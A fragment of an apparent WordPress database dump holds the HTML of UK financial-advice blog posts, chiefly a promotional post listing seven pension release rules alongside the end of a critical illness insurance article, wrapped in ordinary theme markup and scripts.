href=\"http://www.facebook.com/sharer.php?m2w&amp;s=100&amp;p[url]=http://www.reidscottross.co.uk/5-powerful-reasons-review-critical-illness-insurance/&amp;p[title]=5%20Powerful%20Reasons%20To%20Review%20Your%20Critical%20illness%20Insurance\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Facebook&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Facebook</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"twitter\">&#13;\n						<a href=\"http://twitter.com/home?status=5+Powerful+Reasons+To+Review+Your+Critical+illness+Insurance+%20http://www.reidscottross.co.uk/5-powerful-reasons-review-critical-illness-insurance/\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Twitter&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Twitter</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"linkedin\">&#13;\n						<a href=\"http://linkedin.com/shareArticle?mini=true&amp;url=http://www.reidscottross.co.uk/5-powerful-reasons-review-critical-illness-insurance/&amp;title=5%20Powerful%20Reasons%20To%20Review%20Your%20Critical%20illness%20Insurance\" target=\"_blank\" rel=\"nofollow\">&#13;\n							LinkedIn&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>LinkedIn</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"reddit\">&#13;\n						<a href=\"http://reddit.com/submit?url=http://www.reidscottross.co.uk/5-powerful-reasons-review-critical-illness-insurance/&amp;title=5%20Powerful%20Reasons%20To%20Review%20Your%20Critical%20illness%20Insurance\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Reddit&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Reddit</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"tumblr\">&#13;\n						<a href=\"http://www.tumblr.com/share/link?url=http%3A%2F%2Fwww.reidscottross.co.uk%2F5-powerful-reasons-review-critical-illness-insurance%2F&amp;name=5+Powerful+Reasons+To+Review+Your+Critical+illness+Insurance+&amp;description=Do+you+spend+any+time+on+the+small+print+on+your+critical+illness+insurance+cover%3F++In+fact+most+people+will+take+a+quick+look+at+the+conditions+and+assume+they+are+fully+covered%2C+before+putting+it+away+in+a+drawer.\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Tumblr&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Tumblr</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"google\">&#13;\n						<a href=\"https://plus.google.com/share?url=http://www.reidscottross.co.uk/5-powerful-reasons-review-critical-illness-insurance/\" onclick=\"javascript:window.open(this.href,&#13;&#10;  \'\', \'menubar=no,toolbar=no,resizable=yes,scrollbars=yes,height=600,width=600\');return false;\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Google +1&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Google +1</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"tf-pinterest\">&#13;\n												<a href=\"#\">&#13;\n							Pinterest&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Pinterest</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"email\">&#13;\n						<a href=\"mailto:?subject=5 Powerful Reasons To Review Your Critical illness Insurance&amp;body=http://www.reidscottross.co.uk/5-powerful-reasons-review-critical-illness-insurance/\">&#13;\n							Email&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Email</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n									</ul></div>&#13;\n									<div class=\"about-author\">&#13;\n				<div class=\"title\"><h2>About the Author: <a href=\"../author/paul/\" title=\"Posts by Becky Barnet\" rel=\"author\"/></h2><div class=\"title-sep-container\"><div class=\"title-sep\"/></div></div>&#13;\n				<div class=\"about-author-container\">&#13;\n					<div class=\"avatar\">&#13;\n											</div>&#13;\n					<div class=\"description\"/>&#13;\n				</div>&#13;\n			</div>&#13;\n			&#13;\n												&#13;\n							&#13;\n<!-- You can start editing here. -->&#13;\n&#13;\n&#13;\n			<!-- If comments are open, but there are no comments. -->&#13;\n&#13;\n	 &#13;\n&#13;\n&#13;\n									<div id=\"respond\" class=\"comment-respond\">&#13;\n				<h3 id=\"reply-title\" class=\"comment-reply-title\"><div class=\"title\"><h2> </h2><div class=\"title-sep-container\"><div class=\"title-sep\"/></div></div> <small><a rel=\"nofollow\" id=\"cancel-comment-reply-link\" href=\"../5-powerful-reasons-review-critical-illness-insurance/\" style=\"display:none;\">Cancel reply</a></small>&#13;\n									</h3><form action=\"/\" method=\"post\" id=\"commentform\" class=\"comment-form\">&#13;\n																										<div id=\"comment-input\"><input type=\"text\" name=\"author\" id=\"author\" value=\"\" placeholder=\"Name (required)\" size=\"22\" tabindex=\"1\" aria-required=\"true\" class=\"input-name\"/><input type=\"text\" name=\"email\" id=\"email\" value=\"\" placeholder=\"Email (required)\" size=\"22\" tabindex=\"2\" aria-required=\"true\" class=\"input-email\"/></div>&#13;\n												<div id=\"comment-textarea\"/>												<p class=\"form-submit\">&#13;\n							<input name=\"submit\" type=\"submit\" id=\"comment-submit\" value=\"Post Comment\"/><input type=\"hidden\" name=\"comment_post_ID\" value=\"7394\" id=\"comment_post_ID\"/></p>&#13;\n						<p style=\"display: none;\"><input type=\"hidden\" id=\"akismet_comment_nonce\" name=\"akismet_comment_nonce\" value=\"286ab98067\"/></p>&#13;\n<p style=\"display: none;\"><input type=\"hidden\" id=\"ak_js\" name=\"ak_js\" value=\"138\"/></p>					&#13;\n							</form></div><!-- #respond -->&#13;\n			        <script type=\"text/javascript\"><![CDATA[\r\n            jQuery(document).ready(function () {\r\n                jQuery(\'#commentform\').submit(function () {\r\n                    _gaq.push(\r\n                            [\'_setAccount\', \'UA-10958181-3\'],\r\n                            [\'_trackEvent\', \'comment\', \'submit\']\r\n                    );\r\n                });\r\n            });\r\n        ]]></script></div>&#13;\n			</div>&#13;\n		<div id=\"sidebar\" style=\"display:none\">&#13;\n	<div id=\"text-24\" class=\"widget widget_text\">			<div class=\"textwidget\"><center><big><big><big>JOIN OVER 5,000</big></big></big><br/><br/>people who get our best financial wisdom on a weekly basis.</center><br/><a href=\"https://my.leadpages.net/leadbox/1449111f3f72a2%3A125d9572eb46dc/5763711893504000/\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-widget\',\'http://my.leadpages.net\']);\" target=\"_blank\"/><script type=\"text/javascript\" src=\"../leadbox-694.js\"/></div>&#13;\n		</div><div id=\"recent_works-widget-2\" class=\"widget recent_works\"><div class=\"heading\"><p>New Guides</p></div>		<div class=\"recent-works-items clearfix\">&#13;\n										<a href=\"../portfolio-items/smart-money-nov-dec/\" title=\"Smart Money: Nov-Dec\">&#13;\n					</a>&#13;\n								<a href=\"../portfolio-items/critical-illness-guide/\" title=\"Critical Illness Guide\">&#13;\n					</a>&#13;\n								<a href=\"../portfolio-items/guide-auto-enrolment/\" title=\"A Guide To Auto Enrolment\">&#13;\n					</a>&#13;\n				</div>&#13;\n&#13;\n		</div><div id=\"pyre_tabs-widget-2\" class=\"widget pyre_tabs\">		<div class=\"tab-holder\">&#13;\n			<div class=\"tab-hold tabs-wrapper\">&#13;\n				<ul id=\"tabs\" class=\"tabset tabs\"><li><a href=\"#tab-popular\">Popular</a></li>&#13;\n															<li><a href=\"#tab-recent\">Recent</a></li>&#13;\n														</ul><div class=\"tab-box tabs-container\">&#13;\n										<div id=\"tab-popular\" class=\"tab tab_content\" style=\"display: none;\">&#13;\n												<ul class=\"news-list\"><li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../can-i-sell-my-pension-under-55/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../can-i-sell-my-pension-under-55/\">Can I sell my Pension under 55?</a>&#13;\n									<div class=\"meta\">&#13;\n										October 12th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../best-annuity-rates/\">&#13;\n										<img width=\"52\" height=\"43\" src=\"../wp-content/uploads/2013/02/Lighthouse-symbolism-image-photo1-e1364375976209.jpg\" class=\"attachment-tabs-img wp-post-image\" alt=\"Annuity Rates\"/></a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../best-annuity-rates/\">What Are The Best Annuity Rates in The UK</a>&#13;\n									<div class=\"meta\">&#13;\n										March 21st, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"/\">The UK’s Income Protection Time Bomb</a>&#13;\n									<div class=\"meta\">&#13;\n										September 10th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../g-day-impact-gender-directive-insurance/\">&#13;\n										<img width=\"52\" height=\"21\" src=\"../wp-content/uploads/2012/09/headline-image-composite-preview.jpg\" class=\"attachment-tabs-img wp-post-image\" alt=\"headline-image-composite-preview\"/></a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../g-day-impact-gender-directive-insurance/\">G-day – Impact of the Gender Directive on Insurance</a>&#13;\n									<div class=\"meta\">&#13;\n										September 18th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../what-does-a-wealth-managerdo/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../what-does-a-wealth-managerdo/\">What Does a Wealth Manager Do?</a>&#13;\n									<div class=\"meta\">&#13;\n										September 5th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n													</ul></div>&#13;\n															<div id=\"tab-recent\" class=\"tab tab_content\" style=\"display: none;\">&#13;\n												<ul class=\"news-list\"><li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"/\">How Your Smartphone Can Improve Your Health</a>&#13;\n									<div class=\"meta\">&#13;\n										June 10th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../5-facts-know-annuities/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../5-facts-know-annuities/\">5 Facts You Should Know About Annuities</a>&#13;\n									<div class=\"meta\">&#13;\n										June 9th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../new-individual-savings-accounts-qa/\">The New Individual Savings Accounts — Q&amp;A</a>&#13;\n									<div class=\"meta\">&#13;\n										June 6th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../automatic-enrolment/\">What is Automatic Enrolment</a>&#13;\n									<div class=\"meta\">&#13;\n										June 6th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../staging-date-social-advisors/\">When is your Staging Date Social Advisors</a>&#13;\n									<div class=\"meta\">&#13;\n										June 6th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n													</ul></div>&#13;\n														</div>&#13;\n			</div>&#13;\n		</div>&#13;\n		</div><div id=\"categories-3\" class=\"widget widget_categories\"><div class=\"heading\"><p>Post Categories</p></div><select name=\"cat\" id=\"cat\" class=\"postform\"><option value=\"-1\">Select Category</option><option class=\"level-0\" value=\"13\">Annuities  (2)</option><option class=\"level-0\" value=\"8\">Insurance Protection  (5)</option><option class=\"level-0\" value=\"5\">Investments  (3)</option><option class=\"level-0\" value=\"4\">Pensions  (9)</option><option class=\"level-0\" value=\"6\">Trusts  (1)</option><option class=\"level-0\" value=\"33\">Video  (4)</option><option class=\"level-0\" value=\"1\">Wealth Management  (17)</option></select><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\n	var dropdown = document.getElementById(\"cat\");\r\n	function onCatChange() {\r\n		if ( dropdown.options[dropdown.selectedIndex].value > 0 ) {\r\n			location.href = \"http://www.equalitywalk.org.uk/?cat=\"+dropdown.options[dropdown.selectedIndex].value;\r\n		}\r\n	}\r\n	dropdown.onchange = onCatChange;\r\n/* ]]]]><![CDATA[> */\r\n]]></script></div><div id=\"social_links-widget-2\" class=\"widget social_links\"><div class=\"heading\"><p>Get Social</p></div>		<ul class=\"social-networks  clearfix\"><li class=\"rss\">&#13;\n				<a class=\"rss\" href=\"http://feeds.feedburner.com/Equity SMART\" target=\"_blank\" rel=\"nofollow\">RSS</a>&#13;\n				<div class=\"popup\">&#13;\n					<div class=\"holder\">&#13;\n						<p>RSS</p>&#13;\n					</div>&#13;\n				</div>&#13;\n			</li>&#13;\n												<li class=\"twitter\">&#13;\n				<a class=\"twitter\" href=\"https://twitter.com/Equity SMART target=\" _blank=\"\" rel=\"nofollow\">Twitter</a>&#13;\n				<div class=\"popup\">&#13;\n					<div class=\"holder\">&#13;\n						<p>Twitter</p>&#13;\n					</div>&#13;\n				</div>&#13;\n			</li>&#13;\n																																																								</ul></div><div id=\"text-23\" class=\"widget widget_text\">			<div class=\"textwidget\"><a href=\"https://my.leadpages.net/leadbox/14392e473f72a2%3A125d9572eb46dc/5699942098141184/\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-widget\',\'http://my.leadpages.net\']);\" target=\"_blank\"><img src=\"../WcBxvj97f6ImTTzlT4h-unuce5ZXpmlrf0JzFKpvBWJyilIlbrxaszuw0Y2NMVq3U1GZSw9_oe6GL-pXCIamWAg_s0.jpg\"/></a><script type=\"text/javascript\" src=\"../leadbox-690.js\"/></div>&#13;\n		</div>	</div>&#13;\n		</div>&#13;\n	</div>&#13;\n				<footer class=\"footer-area\"><div class=\"avada-row\">&#13;\n			<section class=\"columns columns-3\"><article class=\"col\"><div id=\"recent-posts-3\" class=\"footer-widget-col widget_recent_entries\">		<p>Our Latest Posts</p>		<ul><li>&#13;\n				<a href=\"/\">How Your Smartphone Can Improve Your Health</a>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../5-facts-know-annuities/\">5 Facts You Should Know About Annuities</a>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../new-individual-savings-accounts-qa/\">The New Individual Savings Accounts — Q&amp;A</a>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../automatic-enrolment/\">What is Automatic Enrolment</a>&#13;\n						</li>&#13;\n				</ul><div style=\"clear:both;\"/></div>				</article><article class=\"col\"><div id=\"contact_info-widget-2\" class=\"footer-widget-col contact_info\"><p>Contact Info</p>		<div class=\"contact-info-container\">&#13;\n				<p class=\"address\">Manchester &amp; London</p>&#13;\n		&#13;\n				<p class=\"phone\">Phone: </p>&#13;\n		&#13;\n		&#13;\n		&#13;\n				<p class=\"email\">Email: <a href=\"mailto:enquiries@reidscottross.co.uk\">Click To Email</a></p>&#13;\n		&#13;\n				&#13;\n				</div>&#13;\n		<div style=\"clear:both;\"/></div>				</article><article class=\"col\"><div style=\"clear:both;\"/></article></section></div>				&#13;\n&#13;\n				<article class=\"col last\"/></footer></div>&#13;\n	&#13;\n			<footer id=\"footer\"/><!-- wrapper --><script type=\"text/javascript\" src=\"../maps/api/js_v_3.exp_amp_sensor_false_amp_language_en.js\"/><!-- W3TC-include-js-head --><script type=\"text/javascript\"><![CDATA[\r\njQuery(window).load(function() {\r\n\r\njQuery( \'#wooslider-id-1\' ).flexslider2({namespace: \"wooslider-\"\r\n, animation: \'fade\', slideshowSpeed: 7000, animationSpeed: 600, slideshow: true, directionNav: true, keyboard: false, mousewheel: false, pausePlay: false, randomize: false, animationLoop: true, pauseOnAction: true, pauseOnHover: false, smoothHeight: false, touch: true, controlNav: true});\r\n\r\n});\r\n]]></script><link rel=\"stylesheet\" id=\"js_composer_front-css\" href=\"../wp-content/plugins/js_composer/assets/css/js_composer_front.css\" type=\"text/css\" media=\"all\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.form.min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar _wpcf7 = {\"loaderUrl\":\"http://www.equalitywalk.org.uk/wp-content/plugins/contact-form-7/images/ajax-loader.gif\",\"sending\":\"Sending ...\",\"cached\":\"1\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/contact-form-7/includes/js/scripts.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/swfupload.min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar iphormL10n = {\"error_submitting_form\":\"An error occurred submitting the form\",\"swfupload_flash_url\":\"http://www.equalitywalk.org.uk/wp-includes/js/swfupload/swfupload.swf\",\"swfupload_upload_url\":\"http://www.equalitywalk.org.uk/?iphorm_swfupload=1\",\"swfupload_too_many\":\"You have attempted to queue too many files\",\"swfupload_file_too_big\":\"This file exceeds the maximum upload size\",\"swfupload_file_empty\":\"This file is empty\",\"swfupload_file_type_not_allowed\":\"This file type is not allowed\",\"swfupload_unknown_queue_error\":\"Unknown queue error, please try again later\",\"swfupload_upload_error\":\"Upload error\",\"swfupload_upload_failed\":\"Upload failed\",\"swfupload_server_io\":\"Server IO error\",\"swfupload_security_error\":\"Security error\",\"swfupload_limit_exceeded\":\"Upload limit exceeded\",\"swfupload_validation_failed\":\"Validation failed\",\"swfupload_upload_stopped\":\"Upload stopped\",\"swfupload_unknown_upload_error\":\"Unknown upload error\",\"plugin_url\":\"http://www.equalitywalk.org.uk/wp-content/plugins/iphorm-form-builder\",\"preview_no_submit\":\"The form cannot be submitted in the preview\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.iphorm.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.smooth-scroll.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/qtip2/jquery.qtip.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/fancybox/jquery.fancybox-1.3.4.pack.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/uniform/jquery.uniform.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.infieldlabel.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/themes/light/rounded.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.mousewheel.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.flexslider.min.js\"/><script type=\"text/javascript\" src=\"../wp-includes/js/comment-reply.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/modernizr-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.carouFredSel-6.2.1-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.prettyPhoto-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.flexslider-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.fitvids-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/gmap-min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar js_local_vars = {\"dropdown_goto\":\"Go to...\",\"mobile_nav_cart\":\"Shopping Cart\",\"page_smoothHeight\":\"false\",\"flex_smoothHeight\":\"false\",\"language_flag\":\"ICL_LANGUAGE_CODE\",\"infinite_blog_finished_msg\":\"<em>All posts displayed</em>\",\"infinite_blog_text\":\"<em>Loading the next set of posts...</em>\",\"portfolio_loading_text\":\"<em>Loading Portfolio Items...</em>\",\"faqs_loading_text\":\"<em>Loading FAQ Items...</em>\",\"order_actions\":\"Details\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/main.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/js_composer/assets/js/js_composer_front.js\"/></body>','&#13;	5 Powerful Reasons To Review Your Critical illness Insurance','If you have bought critical illness insurance from a bank, adviser or online between 2005 and 2011 learn more about how you increase your payout chances','publish','closed','closed','','5-powerful-reasons-to-review-your-critical-illness-insurance','','','2017-09-21 16:46:56','2017-09-21 16:46:56','',0,'http://www.equalitywalk.org.uk/5-powerful-reasons-to-review-your-critical-illness-insurance',0,'post','',0),(43,1,'2017-09-21 16:34:25','2017-09-21 16:34:25','<body class=\"single single-post postid-6449 single-format-standard light  wpb-js-composer js-comp-ver-3.5.4 vc_responsive\">&#13;\n&#13;\n&#13;\n&#13;\n&#13;\n	<div id=\"wrapper\">&#13;\n					<div class=\"header-wrapper\">&#13;\n			<div class=\"header-v2\">&#13;\n		<div class=\"header-social\">&#13;\n		<div class=\"avada-row\">&#13;\n			&#13;\n			&#13;\n		</div>&#13;\n	</div>&#13;\n		<header id=\"header\"/></div>		</div>&#13;\n				<div id=\"sliders-container\">&#13;\n									</div>&#13;\n					<div class=\"page-title-container\">&#13;\n		<div class=\"page-title\">&#13;\n			<div class=\"page-title-wrapper\">&#13;\n				<div class=\"page-title-captions\">&#13;\n										<h1 class=\"entry-title\">&#13;\n										7 Pension Release Rules to consider – so YOU don’t lose out.										</h1>&#13;\n														</div>&#13;\n															<ul class=\"breadcrumbs\"><li> <a href=\"/\">Home</a></li><li><a href=\"../category/pensions/\" title=\"Pensions\">Pensions</a></li><li>7 Pension Release Rules to consider – so YOU don’t lose out.</li></ul></div>&#13;\n		</div>&#13;\n	</div>&#13;\n													<div id=\"main\" class=\"\" style=\"overflow:hidden !important;\">&#13;\n		<div class=\"avada-row\" style=\"\">&#13;\n					<div id=\"content\" style=\"float:left;\">&#13;\n										<div class=\"single-navigation clearfix\">&#13;\n			<a href=\"../pension-liberation-good-plan-or-bad-scam/\" rel=\"prev\">Previous</a>			<a href=\"../what-does-a-wealth-managerdo/\" rel=\"next\">Next</a>		</div>&#13;\n						<div id=\"post-6449\" class=\"post-6449 post type-post status-publish format-standard hentry category-pensions tag-pension-release tag-pension-rules post\">&#13;\n												<div class=\"post-content\">&#13;\n				<p><span style=\"font-family: arial,helvetica,sans-serif; font-size: medium;\"> <img class=\"alignleft\" style=\"border: 10px solid white;\" alt=\"pension release rules\" src=\"../wp-content/uploads/2013/08/pension-release-rules.jpg\" width=\"247\" height=\"164\"/></span>Why do we pay into a pension? Put simply – we do it because we want our future to be secure.</p>&#13;\n<p>We want to be able to enjoy life after we’ve retired, to live in comfort and afford things we enjoy.</p>&#13;\n<p>After all, when you worked so hard during your years of employment, you deserve to enjoy your time of retirement. </p>&#13;\n<p>Paying into a pension plan, as we all know, is intended to make your life in retirement more comfortable. It’s your future – you deserve to enjoy it!</p>&#13;\n<p><span style=\"color: #ff0000;\"><span style=\"color: #000000;\">We all know that the state pension is no longer enough to bring you the financial security that you want in retirement, and hardly a day goes by that we are told that we are not saving enough for our retirement</span>.</span></p>&#13;\n<p>That’s why your choices become more complicated if you reach a point in your life when you start to consider if you can release some of your pension funds before you retire.</p>&#13;\n<p>Your retirement date when you can take your full pension is normally set by the rules of your personal or works pension normally 60 or 65, in some instances you can elect to take your pension earlier provided you are over 55. One of your options is to access your tax free lump sum up to 25% of your pension pot, whatever you want that money for is up to you.</p>&#13;\n<p>You might want it for a special holiday, or to treat yourself to something after which you’ve hankered for a while. You might want to invest it somewhere else. Or you might simply need it to help you out financially for a while. It’s worth thinking long and hard about.</p>&#13;\n<p>It’s also worth doing properly. There are important factors to consider before you make any firm decisions regarding releasing your pension – and to be fully informed.</p>&#13;\n<h2>Pension Release Rules To Consider…</h2>&#13;\n<div class=\"simple-grey-box\" style=\"margin: 5px auto 20px; width: 70%;\">1. In order to qualify, pension release rules state that you must be 55 years old or over, unless your scheme allows early release due to severe medical reasons, like a terminal illness.</div>&#13;\n<div class=\"simple-grey-box\" style=\"margin: 5px auto 20px; width: 70%;\">2. 25% of your total pensions – including any that you haven’t paid into for a while (ie. from a previous job) can be released as a tax free lump sum (you’re liable to income tax for anything beyond 25%).</div>&#13;\n<div class=\"simple-grey-box\" style=\"margin: 5px auto 20px; width: 70%;\">3. You may come across unregulated pension companies advising you to release money from your pension before 55. They are looking to exploit loopholes in the rules, meaning funds released will come with high charges and taxation and should be avoided at all costs.</div>&#13;\n<div class=\"simple-grey-box\" style=\"margin: 5px auto 20px; width: 70%;\">4. If you have more than one pension, you can only release 25% of the total pensions tax free.</div>&#13;\n<div class=\"simple-grey-box\" style=\"margin: 5px auto 20px; width: 70%;\">5. If you are in receipt of means tested benefit this might be affected if you take cash from your pension.</div>&#13;\n<div class=\"simple-grey-box\" style=\"margin: 5px auto 20px; width: 70%;\">6.  You can release cash from a pension that you are not currently paying in to – so if you have an old company pension that you haven’t paid into for years, it is still available for pension release.</div>&#13;\n<div class=\"simple-grey-box\" style=\"margin: 5px auto 20px; width: 70%;\">7. Pension release will have a damaging effect on your potential retirement income and a less financially comfortable retirement. As well as reducing your pension pot, taking cash out of your pension fund early could mean losing ill health or death benefits along with any investment benefits that the sum may have accrued.</div>&#13;\n<p>It’s true that you really need to think long and hard about the effects of early pension withdrawal later in life. And that’s just one of the reasons that you should ensure that you get the best unbiased and fully independent advice regarding pension release rules.</p>&#13;\n<p>At Equity SMART we have everything in place to make sure that you can make the most of your pension after 55 – getting a tax-free lump sum when you need it and for whatever you need it for. You’ll get the best advice available from experienced pension professionals – people who know finance inside-out and care about what happens to you and your money.</p>&#13;\n<p>Put simply, Equity SMART get things right. When it comes to releasing money from your pension early, we ready to listen to you and help shape your finances and your future for the better.</p>&#13;\n<p>Now surely that’s worth thinking about?</p>&#13;\n							</div>&#13;\n						<div class=\"meta-info\">&#13;\n				<div class=\"alignleft vcard\">&#13;\n					<span class=\"fn\">By <a href=\"../author/paul/\" title=\"Posts by Becky Barnet\" rel=\"author\"/></span><span class=\"sep\">|</span><a href=\"../category/pensions/\" title=\"View all posts in Pensions\" rel=\"category tag\">Pensions</a><span class=\"sep\">|</span><a href=\"../7-pension-release-rules/\" title=\"Comment on 7 Pension Release Rules to consider – so YOU don’t lose out.\">0 Comments</a>				</div>&#13;\n			</div>&#13;\n									<div class=\"share-box\">&#13;\n				<h4> </h4>&#13;\n				<ul class=\"social-networks social-networks-dark\"><li class=\"facebook\">&#13;\n						<a href=\"http://www.facebook.com/sharer.php?u=http://www.equalitywalk.org.uk/7-pension-release-rules/&amp;t=7%20Pension%20Release%20Rules%20to%20consider%20%E2%80%93%20so%20YOU%20don%E2%80%99t%20lose%20out.\" target=\"_blank\">&#13;\n							Facebook&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Facebook</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"twitter\">&#13;\n						<a href=\"http://twitter.com/home?status=7%20Pension%20Release%20Rules%20to%20consider%20%E2%80%93%20so%20YOU%20don%E2%80%99t%20lose%20out.%20http://www.equalitywalk.org.uk/7-pension-release-rules/\" target=\"_blank\">&#13;\n							Twitter&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Twitter</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"linkedin\">&#13;\n						<a href=\"http://linkedin.com/shareArticle?mini=true&amp;url=http://www.equalitywalk.org.uk/7-pension-release-rules/&amp;title=7%20Pension%20Release%20Rules%20to%20consider%20%E2%80%93%20so%20YOU%20don%E2%80%99t%20lose%20out.\" target=\"_blank\">&#13;\n							LinkedIn&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>LinkedIn</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n																									<li class=\"google\">&#13;\n						<a href=\"https://plus.google.com/share?url=http://www.equalitywalk.org.uk/7-pension-release-rules/\" onclick=\"javascript:window.open(this.href,&#13;&#10;  \'\', \'menubar=no,toolbar=no,resizable=yes,scrollbars=yes,height=600,width=600\');return false;\" target=\"_blank\">&#13;\n							Google +1&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Google +1</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n																				<li class=\"email\">&#13;\n						<a href=\"mailto:?subject=7 Pension Release Rules to consider – so YOU don’t lose out.&amp;body=http://www.equalitywalk.org.uk/7-pension-release-rules/\">&#13;\n							Email&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Email</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n									</ul></div>&#13;\n						&#13;\n												&#13;\n						&#13;\n												&#13;\n<!-- You can start editing here. 